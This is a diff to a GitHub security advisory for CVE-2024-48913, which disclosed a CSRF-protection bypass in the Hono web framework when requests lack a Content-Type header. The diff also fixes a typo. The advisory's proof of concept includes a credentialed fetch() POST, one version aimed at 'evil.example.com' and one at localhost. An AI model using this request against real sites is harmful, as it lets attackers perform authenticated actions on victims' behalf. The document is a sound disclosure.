[GHSA-2234-fmw7-43wr] Hano allows bypass of CSRF Middleware by a request without Content-Type header.

advisories/github-reviewed/2024/10/GHSA-2234-fmw7-43wr/GHSA-2234-fmw7-43wr.json

@@ -1,12 +1,12 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-2234-fmw7-43wr",
-  "modified": "2024-10-15T19:56:22Z",
+  "modified": "2024-10-28T13:41:00Z",
   "published": "2024-10-15T17:43:50Z",
   "aliases": [
     "CVE-2024-48913"
   ],
-  "summary": "Hano allows bypass of CSRF Middleware by a request without Content-Type header.",
+  "summary": "Hono allows bypass of CSRF Middleware by a request without Content-Type header.",
   "details": "### Summary\nBypass CSRF Middleware by a request without Content-Type herader.\n\n### Details\nAlthough the csrf middleware verifies the Content-Type Header, Hono always considers a request without a Content-Type header to be safe.\n\nhttps://github.com/honojs/hono/blob/cebf4e87f3984a6a034e60a43f542b4c5225b668/src/middleware/csrf/index.ts#L76-L89\n\n### PoC\n```server.js\n// server.js\nimport { Hono } from 'hono'\nimport { csrf }from 'hono/csrf'\nconst app = new Hono()\napp.use(csrf())\napp.get('/', (c) => {\n  return c.html('Hello Hono!')\n})\napp.post('/', async (c) => {\n  console.log(\"executed\")\n  return c.text( await c.req.text())\n})\nDeno.serve(app.fetch)\n```\n\n```poc.html\n<!-- PoC.html -->\n<script>\nasync function myclick() {\n    await fetch(\"http://evil.example.com\", {\n    method: \"POST\",\n    credentials: \"include\",\n    body:new Blob([`test`],{}),\n    });\n}\n</script>\n<input type=\"button\" onclick=\"myclick()\" value=\"run\" />\n```\n\nSimilarly, the fetch API does not add a Content-Type header for requests that do not include a Body.\n```PoC2.js\nawait fetch(\"http://localhost:8000\", { method: \"POST\", credentials: \"include\"});\n```\n\n### Impact\nBypass csrf protection implemented with hono csrf middleware.\n",
   "severity": [
     {